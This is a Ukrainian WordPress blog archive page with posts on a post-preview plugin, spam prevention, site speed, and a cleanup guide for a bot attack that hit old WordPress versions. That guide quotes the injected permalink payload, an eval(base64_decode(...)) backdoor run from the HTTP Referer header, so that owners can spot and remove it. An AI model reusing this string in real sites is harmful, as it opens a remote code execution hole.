sitemap archive

Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!

в категорії wordpress фішки

теги :

Українською

Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

захищаєм блог від хакерівТак в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії Wordpress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв'яка, бота (називайте як хочете) потрібно зробити:

  • В налаштуваннях ЧПУ, поміняти з
    /%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    на
    /%postname%/
    (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
  • Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
  • Оновити Wordpress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу

[Post to Twitter] 

Викинь візуальний редактор! Є ж плагін Post Preview від Dimox'a

в категорії wordpress фішки

теги :

Як мене дістав візуальний редактор TinyMCE, що включений в Wordpress по-замовчуванню. Я не спорю, для чайників краще писати пости в візуальних редакторах, але мене просто бісить та кількість надлишкового коду, що формують візуальні редактори і те, що вони інколи такі „коники“ викидають в коді, що диву даєшься, як він міг до такого додуматись, особливо, коли пробуєш в ньому робити табличні дані з малюнками та списками всередині.

В черговий раз, коли візуальний редактор вибрикнувся, я написав в твіттер: «Ну чого, ніхто, до сих пір, не зробив плагіну, який би вимкнув візуальний редактор і замість нього втиснути попередній перегляд поста?». І вже вкотре, спрацювала «сила твіттера» — на мій твіт відгукнувся Dimox — наворочений верстальщик, майстер css'у. Ми обговорили деталі і він сказав, що залюбки зробить цей плагін на Jquery. Сказано — зроблено! Через тиждень він мені прислав першу версію плагіну — з тих пір я викинув візуальний редактор.

А сьогодні Dimox написав про цей плагін в пості: WordPress-плагин “Предпросмотр поста в админке” на jQuery
Якщо вам теж не байдуже, що твориться в вашому коді, або ви євангеліст-маньяк w3c стандартів, який ніколи не признавав візуальних редакторів, то вам цей плагін теж прийдеться до душі:

Скачати Jquery Post Preview Скачати плагін jQuery Post Preview

Встановлення плагіну:

  • Зкопіювати папку jquery-post-preview в папку с плагінами: /wp-content/plugins/.
  • Активувати плагін в адмінці Wordpress
  • Вимкнути візуальний редактор в налаштуваннях профілю користувача.

Ось і все! Тепер вся сила HTML та CSS в ваших руках і ніхто вам не зіпсує ідеально форматований код. А якщо вам не вистачає якихось кнопок, що були в візуальному редакторі то їх легко можна додати завдяки плагіну addquicktags:

Скачати AddQuickTags Скачати плагін AddQuickTags

Я за допомогою цього плагіну додав кнопки для H3 та img (малюнка стрілочки завантаження).
Ось так із, мимоходом, кинутої репліки в твіттер, на світ появився новий корисний плагін для Wordpress'у. Спасибі Dimox ;)

update: Юрко aka Skinik зробив український переклад для цих плагінів і опублікував їх на нашому колективному блозі українських перекладів плагінів та тем для Wordpress'у: AddQuicktag Uk 1.5.8+Jquery-post-preview Uk 0.1 Забутьте про глюки у візуальному редакторі

p.s. А ще я намалював кнопочки для GoogleReader та Яндекс.Лєнти (он там в сайдбарі, наверху видно). Як вони вам? Ви їх можете використати і на своєму блозі, я дозволяю =)

[Post to Twitter] 

Хитрий і ефективний метод боротьби зі спамерами. І без КАПЧ

в категорії wordpress фішки

теги :

Ну ви ж знаєте, я фігню не порекомендую. Сам цим способом користуюсь майже півроку і спамерів з того часу не бачив в себе.
Які ви бачили методи боротьби зі спамом? з мого досвіду:

  • плагіни капч (captcha) — фу.
  • Акісмет — не справляється
  • Parasite Eliminator — «хорошо, но не очень». Він стоїть в мене на одному блозі + Akismet і все рівно спам проскакує (інколи на модерації затримується, а інколи й пропускає).
  • інші антиспам-плагіни — fail
  • кумедні рішення — постав галочку «я не робот» чи «нажми на прямокутник», навіть пробувати не хочу, бо знаю як це обходиться
  • відповіді на запитання — ага, один раз наткнувся на питання: «What color is orange?» я спробував і «оранжевий» і «апельсиновий» і «помаранчевий» і «orange» — ніфіга, не пускала шайнтан-машина

Я от обхожу стороною такі блоги, статтю ще можу почитати, але свій коментар лишати не збираюся.

А тепер прийшла пора розказати, чому в мене немає спамерів і для відвідувачів створенні всі умови для зручного коментування.
В мене форма коментування з «подвійним дном» — насправді в мене дві форми — в одну пишуть роботи-спамери, а друга для моїх шанованих відвідувачів.
Два кроки, що позбавлять вас від спаму

[Post to Twitter] 

Давай Wordpress, хутчіш Wordpress

в категорії wordpress фішки

теги :

PHP Speedy гонить і не сигналить :)

php speedy logoДавненько я нічого нового не публікував, все займаюсь іншими речами: роблю свою першу тему для вордпресу, вивчаю css та jquery, взявся за сайт присвячего доктору Хаусу, найняв туди контент-менеджера, тепер всі прибутки з того сайту йдуть їй на зарплату, але впевнений, що це швидко окупиться.

А ще давно я собі намітив в todo'шках, аби оптимізувати код сторінок сайту, бо вони занадто багато займають. Загалом проблема великого розміру коду сторінок властива всім вордпресовським блогам, на які поначіплювано багато плагінів, чи використовують преміум-теми. Колись провіряв по сервісу webo.in свій блог, так він знайшов багато слабких місць і дав довжелезний список рекомендацій, як покращити код сайту і зробити його швидшим та легшим для завантаження.
Коли я то все почав вручну робити, то вже на перших пунктах затикався, бо не знав як додавати ETag / Last-Modified для файлів, зменшувати кількість css та javascript'ів теж непросто, бо не знаєш, чи надовго в тебе той чи інший плагін, який їх використовує. Короче, я забив на то всьо і зрозумів, що ще не доріс до такої оптимізації.

І тут, буквально позавчора натикаюсь на один скрипт, що оптимізує сайти якраз по цим параметрам. А як я втішився, коли побачив, що для wordpress'у вони випустили плагін, що робить всю ручну оптимізацію автоматичною, по натисканню однієї кнопки. Ляпота!

А тепер саме цікавіше... →

[Post to Twitter] 

Литдибр про всяке різне та про класний настрій!

в категорії Життєве

теги :

Відпочиваючи

Ну по перше в мене відпустка! З якої я вже встиг побувати тиждень в Харкові, ще тиждень в Одесі — вражень купа! Зараз вдома, але на вихідні їду в Буковель (буду пробувати сноуборд освоювати).

Я в DMOZ'і

Хочу висловити величезну подяку редактору DMOZ'у що включив мене в цей каталог! Чувак, признавайся хто ти — з мене пиво. Також вітаю всіх, хто знаходиться поруч зі мною в категорії українських блогів — там багато знайомих особистостей, але й виявились декотрі, кого я ще не знав, тож буду знайомитись. А я тепер можу почесно носити цей банер:

dmoz

Wordpress 2.7 українською

Wordpress in UkrainianВсі уже мабудь в курсі, що вийшов довгожданий Wordpress версії 2.7, але не всі в курсі, що наш улюблений вордпрес вже є на нашій улюбленій українській мові: http://pavonine.com.ua/2008/12/wordpress-27/  — За що величезне спасибі Богдану aka G3D з яким ми разом розвиваємо «Веселку українскьих CMS'ок»

почитати продовження →

[Post to Twitter] 

LilumiМене звати LiluMi, а це мій блоґ. Тут про веб-розробку та лайфхаки. Рекомендую підписатись на RSS Інформацію про мене читайте на сторінці me LiluMi

Що тобі до вподоби?

]]> greader Yandex-lenta
Читать на русском (чиста паржать) ]]>
]]>
follow me on Twitter
UA TOP Bloggers
Рейтинг блогов Рейтинг блога lilumi.org.ua Рейтинг блогов
]]>
Безкоштовний хостинг TOPUA

Тобі передають привіт 32 медвежаток. Це підняло тобі настрій на 1.409 а в Австралії живе колібрі у якої дзьобик довжиною на 12.72см.